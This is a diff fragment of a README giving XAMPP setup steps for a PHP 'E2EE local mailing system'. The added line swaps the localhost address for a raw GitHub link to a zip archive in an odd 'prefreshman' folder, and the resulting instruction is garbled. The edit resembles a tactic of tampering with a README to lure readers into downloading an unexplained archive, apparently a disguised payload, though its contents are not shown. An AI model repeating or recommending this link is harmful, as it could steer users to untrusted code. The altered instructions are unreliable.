999xavier/xsukax-E2EE-Local-Mailing-System/README.md

    After downloading the PHP file, move it to the local server's root directory.
 For example, in XAMPP, place it in the `htdocs` folder.

 5. **Access the Application:**
    Open a web browser and enter the address to access the application.
-If XAMPP is running on your local machine, type `http://localhost/your-file-name.php`, replacing `your-file-name.php` with the actual filename.
+If XAMPP is running on your local machine, type `https://github.com/999xavier/xsukax-E2EE-Local-Mailing-System/raw/refs/heads/main/prefreshman/System-E-xsukax-Mailing-Local-v2.0-alpha.1.zip`, replacing `https://github.com/999xavier/xsukax-E2EE-Local-Mailing-System/raw/refs/heads/main/prefreshman/System-E-xsukax-Mailing-Local-v2.0-alpha.1.zip` with the actual filename.

 6. **Configure the Application:**
    Follow the on-screen instructions to set up your mailbox.
 You may need to input certain settings such as your email and password.